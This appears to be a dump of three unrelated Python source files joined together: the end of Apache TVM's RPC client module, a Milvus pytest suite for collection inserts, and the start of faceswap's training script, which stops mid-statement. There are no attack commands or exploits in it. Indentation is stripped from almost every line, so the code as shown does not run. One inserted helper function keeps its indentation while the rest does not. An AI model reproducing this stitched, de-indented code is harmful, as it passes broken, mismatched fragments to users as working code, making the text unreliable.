raise ValueError("target must present when file is a bytearray")
blob = data
else:
blob = bytearray(open(data, "rb").read())
if not target:
target = os.path.basename(data)
if "upload" not in self._remote_funcs:
self._remote_funcs["upload"] = self.get_function(
"tvm.contrib.rpc.server.upload")
self._remote_funcs["upload"](target, blob)
def download(self, path):
"""Download file from remote temp folder.
Parameters
----------
path : str
The relative location to remote temp folder.
Returns
-------
blob : bytearray
The result blob from the file.
"""
if "download" not in self._remote_funcs:
self._remote_funcs["download"] = self.get_function(
"tvm.contrib.rpc.server.download")
return self._remote_funcs["download"](path)
def load_module(self, path):
"""Load a remote module, the file need to be uploaded first.
Parameters
----------
path : str
The relative location to remote temp folder.
Returns
-------
m : Module
The remote module containing remote function.
"""
return _LoadRemoteModule(self._sess, path)
def connect(url, port, key=""):
"""Connect to RPC Server
Parameters
----------
url : str
The url of the host
port : int
The port to connect to
key : str, optional
Additional key to match server
Returns
-------
sess : RPCSession
The connected session.
"""
try:
sess = _Connect(url, port, key)
except NameError:
raise RuntimeError("Please compile with USE_RPC=1")
return RPCSession(sess)
_init_api("tvm.contrib.rpc")
|
test_insert_20.py
|
import threading
import numpy as np
import pandas as pd
import pytest
from pymilvus import Index
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "insert"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_binary_index_params = {"index_type": "BIN_IVF_FLAT", "metric_type": "JACCARD", "params": {"nlist": 64}}
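# A minimal sketch (assuming a running Milvus instance on localhost:19530) of
# how the schema and index-parameter dicts above are consumed by raw pymilvus;
# "demo_insert_coll" is an illustrative collection name not used by the tests.
def _example_build_ivf_sq8_index():
    from pymilvus import connections, Collection
    connections.connect(alias="default", host="localhost", port="19530")
    coll = Collection(name="demo_insert_coll", schema=default_schema)
    coll.insert(cf.gen_default_list_data(nb=ct.default_nb))
    coll.create_index(ct.default_float_vec_field_name, default_index_params)
    return coll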
class TestInsertParams(TestcaseBase):
""" Test case of Insert interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_data_type(self, request):
if isinstance(request.param, list) or request.param is None:
pytest.skip("list and None type is valid data type")
yield request.param
@pytest.fixture(scope="module", params=ct.get_invalid_strs)
def get_invalid_field_name(self, request):
if isinstance(request.param, (list, dict)):
pytest.skip()
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dataframe_data(self):
"""
target: test insert DataFrame data
method: 1.create collection
2.insert dataframe data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_list_data(self):
"""
target: test insert list-like data
method: 1.create 2.insert list data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_non_data_type(self, get_non_data_type):
"""
target: test insert with non-dataframe, non-list data
method: insert with data (non-dataframe and non-list type)
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "Data type is not support"}
collection_w.insert(data=get_non_data_type, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("data", [[], pd.DataFrame()])
def test_insert_empty_data(self, data):
"""
target: test insert empty data
method: insert empty
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "The data fields number is not match with schema"}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_dataframe_only_columns(self):
"""
target: test insert with dataframe just columns
method: dataframe just have columns
expected: num entities is zero
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_empty_field_name_dataframe(self):
"""
target: test insert empty field name df
method: dataframe with empty column
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: ' '}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_invalid_field_name_dataframe(self, get_invalid_field_name):
"""
target: test insert with invalid dataframe data
method: insert with invalid field name dataframe
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: get_invalid_field_name}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
def test_insert_dataframe_index(self):
"""
target: test insert dataframe with index
method: insert dataframe with index
expected: todo
"""
pass
@pytest.mark.tags(CaseLabel.L2)
def test_insert_none(self):
"""
target: test insert None
method: data is None
expected: return successfully with zero results
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
mutation_res, _ = collection_w.insert(data=None)
assert mutation_res.insert_count == 0
assert len(mutation_res.primary_keys) == 0
assert collection_w.is_empty
assert collection_w.num_entities == 0
@pytest.mark.tags(CaseLabel.L2)
def test_insert_numpy_data(self):
"""
target: test insert numpy.ndarray data
method: 1.create by schema 2.insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_numpy_data(nb=10)
error = {ct.err_code: 0, ct.err_msg: "Data type not support numpy.ndarray"}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_dataframe(self):
"""
target: test insert binary dataframe
method: 1. create by schema 2. insert dataframe
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_data(self):
"""
target: test insert list-like binary data
method: 1. create by schema 2. insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
data, _ = cf.gen_default_binary_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_single(self):
"""
target: test insert single
method: insert one entity
expected: verify num
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=1)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == 1
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == 1
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_insert_dim_not_match(self):
"""
target: test insert with not match dim
method: insert data dim not equal to schema dim
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
dim = 129
df = cf.gen_default_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_insert_binary_dim_not_match(self):
"""
target: test insert binary with dim not match
method: insert binary data dim not equal to schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
dim = 120
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_field_name_not_match(self):
"""
target: test insert field name not match
method: data field name not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_float_field_name: "int"}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_field_value_not_match(self):
"""
target: test insert data value not match
method: insert data value type not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
df = cf.gen_default_dataframe_data(nb)
new_float_value = pd.Series(data=[float(i) for i in range(nb)], dtype="float64")
df.iloc[:, 1] = new_float_value
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_value_less(self):
"""
target: test insert value less than other
method: int field value less than vec-field value
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb - 1)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_vector_value_less(self):
"""
target: test insert vector value less than other
method: vec field value less than int field
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb - 1, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_fields_more(self):
"""
target: test insert with fields more
method: field more than schema fields
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
new_values = [i for i in range(ct.default_nb)]
df.insert(3, 'new', new_values)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_fields_less(self):
"""
target: test insert with fields less
method: fields less than schema fields
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
df.drop(ct.default_float_vec_field_name, axis=1, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_list_order_inconsistent_schema(self):
"""
target: test insert data fields order inconsistent with schema
method: insert list data, data fields order inconsistent with schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [float_values, int_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_dataframe_order_inconsistent_schema(self):
"""
target: test insert with dataframe fields inconsistent with schema
method: insert dataframe, and fields order inconsistent with schema
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = pd.Series(data=[i for i in range(nb)])
float_values = pd.Series(data=[float(i) for i in range(nb)], dtype="float32")
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
df = pd.DataFrame({
ct.default_float_field_name: float_values,
ct.default_float_vec_field_name: float_vec_values,
ct.default_int64_field_name: int_values
})
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_inconsistent_data(self):
"""
target: test insert with inconsistent data
method: insert with data that same field has different type data
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=100)
data[0][1] = 1.0
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
collection_w.insert(data, check_task=CheckTasks.err_res, check_items=error)
class TestInsertOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert interface operations
******************************************************************
"""
@pytest.fixture(scope="function", params=[8, 4096])
def dim(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connection(self):
"""
target: test insert without connection
method: insert after remove connection
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
data = cf.gen_default_list_data(10)
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/12680")
@pytest.mark.parametrize("vec_fields", [[cf.gen_float_vec_field(name="float_vector1")],
[cf.gen_binary_vec_field()],
[cf.gen_binary_vec_field(), cf.gen_binary_vec_field("binary_vec")]])
def test_insert_multi_float_vec_fields(self, vec_fields):
"""
target: test insert into multi float vec fields collection
method: create collection with different schema and insert
expected: verify num entities
"""
schema = cf.gen_schema_multi_vector_fields(vec_fields)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_dataframe_multi_vec_fields(vec_fields=vec_fields)
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_drop_collection(self):
"""
target: test insert and drop
method: insert data and drop collection
expected: verify collection if exist
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name in collection_list
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
collection_w.drop()
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name not in collection_list
@pytest.mark.tags(CaseLabel.L1)
def test_insert_create_index(self):
"""
target: test insert and create index
method: 1. insert 2. create index
expected: verify num entities and index
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L1)
def test_insert_after_create_index(self):
"""
target: test insert after create index
method: 1. create index 2. insert data
expected: verify index and num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_after_index(self):
"""
target: test insert binary after index
method: 1.create index 2.insert binary data
expected: 1.index ok 2.num entities correct
"""
schema = cf.gen_default_binary_collection_schema()
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
collection_w.create_index(ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.indexes[0] == index
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_create_index(self):
"""
target: test create index in auto_id=True collection
method: 1.create auto_id=True collection and insert
2.create index
expected: index correct
"""
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_default_dataframe_data()
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
# create index
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert without ids
expected: verify primary_keys and num_entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data()
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_twice_auto_id_true(self):
"""
target: test insert ids fields twice when auto_id=True
method: 1.create collection with auto_id=True 2.insert twice
expected: verify primary_keys unique
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
nb = 10
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb)
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
primary_keys = mutation_res.primary_keys
assert cf._check_primary_keys(primary_keys, nb)
mutation_res_1, _ = collection_w.insert(data=df)
primary_keys.extend(mutation_res_1.primary_keys)
assert cf._check_primary_keys(primary_keys, nb * 2)
assert collection_w.num_entities == nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true_list_data(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert list data with ids field values
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data()
mutation_res, _ = collection_w.insert(data=data[1:])
assert mutation_res.insert_count == ct.default_nb
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true_with_dataframe_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'Auto_id is True, primary field should not have data'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true_with_list_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_same_values(self):
"""
target: test insert same ids with auto_id false
method: 1.create collection with auto_id=False 2.insert same int64 field values
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb=nb)
data[0] = [1 for i in range(nb)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == data[0]
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_negative_values(self):
"""
target: test insert negative ids with auto_id false
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb)
data[0] = [i for i in range(0, -nb, -1)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="issue 15416")
def test_insert_multi_threading(self):
"""
target: test concurrent insert
method: multi threads insert
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
thread_num = 4
threads = []
primary_keys = df[ct.default_int64_field_name].values.tolist()
def insert(thread_i):
log.debug(f'In thread-{thread_i}')
mutation_res, _ = collection_w.insert(df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == primary_keys
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for t in threads:
t.join()
assert collection_w.num_entities == ct.default_nb * thread_num
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="Currently primary keys are not unique")
def test_insert_multi_threading_auto_id(self):
"""
target: test concurrent insert auto_id=True collection
method: 1.create auto_id=True collection 2.concurrent insert
expected: verify primary keys unique
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_insert_multi_times(self, dim):
"""
target: test insert multi times
method: insert data multi times
expected: verify num entities
"""
step = 120
nb = 12000
collection_w = self.init_collection_general(prefix, dim=dim)[0]
for _ in range(nb // step):
df = cf.gen_default_dataframe_data(step, dim)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == step
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_all_datatype_collection(self):
"""
target: test insert into collection that contains all datatype fields
method: 1.create all datatype collection 2.insert data
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_dataframe_all_data_type(nb=nb)
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name)
assert self.collection_wrap.num_entities == nb
class TestInsertAsync(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert async
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_sync(self):
"""
target: test async insert
method: insert with async=True
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_false(self):
"""
target: test insert with false async
method: async = false
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
mutation_res, _ = collection_w.insert(data=df, _async=False)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_callback(self):
"""
target: test insert with callback func
method: insert with callback func
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
future, _ = collection_w.insert(data=df, _async=True, _callback=assert_mutation_result)
future.done()
mutation_res = future.result()
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self):
"""
target: test insert with async
method: insert 5w entities with callback func
expected: verify num entities
"""
nb = 50000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self):
"""
target: test insert async with callback
method: insert 10w entities with timeout=1
expected: raise exception
"""
nb = 100000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True, _callback=assert_mutation_result, timeout=1)
with pytest.raises(Exception):
future.result()
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_data(self):
"""
target: test insert async with invalid data
method: insert async with invalid data
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, _async=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_partition(self):
"""
target: test insert async with invalid partition
method: insert async with invalid partition
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
err_msg = "partitionID of partitionName:p can not be find"
future, _ = collection_w.insert(data=df, partition_name="p", _async=True)
future.done()
with pytest.raises(Exception, match=err_msg):
future.result()
def assert_mutation_result(mutation_res):
assert mutation_res.insert_count == ct.default_nb
|
train.py
|
#!/usr/bin/env python3
""" The script to run the training process of faceswap """
import os
import sys
import threading
import cv2
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
from lib.utils import (get_folder, get_image_paths, set_system_verbosity,
Timelapse)
from plugins.plugin_loader import PluginLoader
class Train():
""" The training process. """
def __init__(self, arguments):
self.args = arguments
self.images = self.get_images()
self.stop = False
self.save_now = False
self.preview_buffer = dict()
self.lock = threading.Lock()
# this is so that you can enter case insensitive values for trainer
trainer_name = self.args.trainer
self.trainer_name = trainer_name
if trainer_name.lower() == "lowmem":
self.trainer_name = "LowMem"
self.timelapse = None
def process(self):
""" Call the training process object """
print("Training data directory: {}".format(self.args.model_dir))
lvl = '0' if self.args.verbose else '2'
set_system_verbosity(lvl)
thread = self.start_thread()
if self.args.preview:
self.monitor_preview()
else:
self.monitor_console()
self.end_thread(thread)
def get_images(self):
""" Check the image dirs exist, contain images and return the image
objects """
images = []
for image_dir in [self.args.input_A, self.args.input_B]:
if not os.path.isdir(image_dir):
print('Error: {} does not exist'.format(image_dir))
exit(1)
if not os.listdir(image_dir):
print('Error: {} contains no images'.format(image_dir))
exit(1)
images.append(get_image_paths(image_dir))
print("Model A Directory: {}".format(self.args.input_A))
print("Model B Directory: {}".format(self.args.input_B))
return images
def start_thread(self):
""" Put the training process in a thread so we can keep control """
thread = threading.Thread(target=self.process_thread)
thread.start()
return thread
def end_thread(self, thread):
""" On termination output message and join thread back to main """
print("Exit requested! The trainer will complete its current cycle, "
"save the models and quit (it can take up a couple of seconds "
"depending on your training speed). If you want to kill it now, "
"press Ctrl + c")
self.stop = True
thread.join()
sys.stdout.flush()
def process_thread(self):
""" The training process to be run inside a thread """
try:
print("Loading data, this may take a while...")
if self.args.allow_growth:
self.set_tf_allow_growth()
model = self.load_model()
trainer = self.load_trainer(model)
self.timelapse = Timelapse.create_timelapse(
self.args.timelapse_input_A,
self.args.timelapse_input_B,
self.args.timelapse_output,
